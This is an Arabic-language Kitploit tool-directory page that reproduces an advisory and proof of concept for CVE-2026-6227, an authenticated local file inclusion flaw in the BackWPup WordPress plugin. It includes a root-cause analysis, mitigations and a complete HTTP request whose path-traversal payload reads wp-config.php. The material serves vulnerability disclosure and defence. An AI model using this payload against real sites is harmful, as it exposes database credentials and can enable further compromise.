Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-6227 — # إثبات مفهوم تعليمي لـ CVE-2026-6227 إثبات مفهوم تعليمي لثغرة CVE-2026-6227، وهي ثغرة تضمين ملفات محلي (Local File Inclusion) تتطلب مصادقة في إضافة BackWPup لـ WordPress، بما في ذلك تحليل السبب الجذري، وطلب الاستغلال، وإرشادات التخفيف. | Kitploit
أدوات/GitHubGitHub/pixel-defaultbr/cve-2026-6227
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثالتعلم والتعليم
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

# إثبات مفهوم تعليمي لـ CVE-2026-6227 إثبات مفهوم تعليمي لثغرة CVE-2026-6227، وهي ثغرة تضمين ملفات محلي (Local File Inclusion) تتطلب مصادقة في إضافة BackWPup لـ WordPress، بما في ذلك تحليل السبب الجذري، وطلب الاستغلال، وإرشادات التخفيف.

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-6227: تضمين الملفات المحلي في BackWPup

CVSS Version Researcher

ملخص الاستشارة

تتأثر إصدارات BackWPup حتى 5.6.6 وما دونها بثغرة تضمين الملفات المحلي (LFI) الموثّقة عبر معامل block_name في نقطة نهاية REST الخاصة بـ /wp-json/backwpup/v1/getblock.

نشأ الخلل بسبب تعقيم غير تكراري عبر str_replace() لأنماط التنقل، وقد تم إصلاحه بالفعل في الإصدار 5.6.7.

البيانات الوصفية

  • CVE: CVE-2026-6227
  • الخطورة: عالية
  • درجة CVSS: 7.2
  • المنتج المتأثر: إضافة BackWPup لووردبريس
  • الإصدارات المتأثرة: <= 5.6.6
  • الإصدار المُصلَح: 5.6.7
  • الحالة: تم التصحيح
  • تاريخ الإفصاح: 2026-04-13
  • الباحث: Pixel_DefaultBR
  • إخلاء مسؤولية

    هذا المستودع مخصص حصريًا لأغراض البحث الأمني التعليمي والأخلاقي. المعلومات المقدمة هنا تهدف إلى مساعدة المسؤولين وفرق الأمن في التحقق من أنظمتهم. لا تستخدم هذا ضد أهداف دون إذن كتابي صريح.

    السطح المتأثر

    • الدالة: BackWPupHelpers::component()
    • نقطة النهاية: POST /wp-json/backwpup/v1/getblock
    • المعامل: block_name
    • مستوى الوصول: مسؤول موثّق (أو مستخدمون مفوّضون بصلاحيات النسخ الاحتياطي)

    تحليل السبب الجذري

    يطبّق محمّل المكونات المتأثر تعقيمًا غير تكراري عبر str_replace() قبل استدعاء include(). يمكن تجاوز ذلك باستخدام أنماط تنقل مصمّمة مثل ....// أو ..././، مما يسمح بحل مسارات يتحكم بها المهاجم.

    التأثير

    • تضمين ملفات PHP محلية عشوائية من نظام ملفات الخادم
    • احتمال كشف بيانات حساسة (مثل wp-config.php)
    • احتمال تنفيذ كود عن بُعد في تكوينات خادم/تطبيق محددة

    بشكل افتراضي، يتطلب الاستغلال وصولًا بمستوى مسؤول. إذا تم تفويض صلاحيات النسخ الاحتياطي، فقد يتمكن المستخدمون ذوو الصلاحيات الأقل من استغلال هذه المشكلة أيضًا.

    شروط الاستغلال المسبقة

    • جلسة ووردبريس موثّقة صالحة
    • nonce صالح لـ REST
    • صلاحيات مسؤول أو صلاحيات نسخ احتياطي مفوّضة

    إثبات المفهوم

    السيناريو: تضمين الملفات المحلي

    1. سجّل الدخول إلى ووردبريس باستخدام حساب يملك صلاحية وظيفة BackWPup.
    2. أطلق طلبًا عاديًا من واجهة الإضافة واعترض حركة المرور باستخدام بروكسي.
    3. حدد طلب POST شرعيًا إلى /wp-json/backwpup/v1/getblock.
    4. استبدل block_name بحمولة تنقّل.

    مثال على الطلب:

    root@kitploit:~
    POST /wp-json/backwpup/v1/getblock HTTP/1.1
    Host: target.example.com
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-WP-Nonce: <your_nonce_here>
    Cookie: wordpress_logged_in_<hash>=<your_session_cookie>
    
    block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
    
    1. لاحظ الاستجابة للتحقق من سلوك تضمين الملفات.

    الجدول الزمني

    • 2026-03: الإبلاغ عن الثغرة إلى البائع
    • 2026-03-25: إصدار تصحيح البائع في 5.6.7
    • 2026-04-13: الإفصاح العام (CVE-2026-6227)

    التخفيف

    • حدّث BackWPup إلى الإصدار 5.6.7 أو أحدث
    • قيّد تعيين صلاحية backwpup للأدوار الموثوقة فقط
    • راجع سجلات التدقيق بحثًا عن وصول مشبوه إلى /wp-json/backwpup/v1/getblock

    المراجع

    • صفحة إضافة البائع: https://wordpress.org/plugins/backwpup/
    • مرجع CVE (Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
    تنزيل الأداة